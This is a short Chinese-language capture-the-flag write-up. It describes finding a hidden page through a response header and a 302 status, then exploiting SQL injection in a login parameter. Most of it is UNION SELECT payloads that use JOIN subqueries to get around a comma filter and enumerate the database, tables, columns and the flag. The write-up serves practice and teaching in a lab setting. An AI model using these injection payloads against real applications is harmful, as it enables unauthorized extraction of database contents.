1、打开题目 一篇空白 发现一直在loading 还以为是网卡没加载 刷新几遍之后 发现原来都是套路
2、根据提示flag在后台 用bp抓包进行测试
看到 login.php?id=1 通过URL进行访问
发现没有什么可以用的信息 再用bp抓包 也灭有可以用信息
最后实在没办法了 看了官方的WP 才知道存在index.php 文件 并在hearder中有提示
通过URL访问之后 bp抓包发现
两个代码相似 状态码不同 最后对比 发现
两者就相差一个字符
把302放入测试中
仔细观察 可以发现后台的提示
之后就是常规的SQL注入
3、
构造错误的闭合 发现与常规闭合不同
再输入 1’ order by 1,2 –
发现过滤掉了逗号后面的内容 因此网上查到不用逗号 使用join代替的 闭合方式
-1’%20 union select * from (select 1) a join (select 2 ) b %23
id=-1’%20 union select * from (select database()) a join (select 2 ) b %23
id=-1’%20 union select * from (select group_concat(table_name) from information_schema.tables where table_schema= database()) a join (select 2 ) b %23 //爆表
id=-1%27%20%20union%20select%20*%20from%20(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27)%20a%20join%20(select%202%20)%20b%20%23
//爆字段
id=-1%27%20%20union%20select%20*%20from%20(select%20group_concat(flag_9c861b688330)%20from%20users)%20a%20join%20(select%202%20)%20b%20%23
//爆数据
提交flag 即可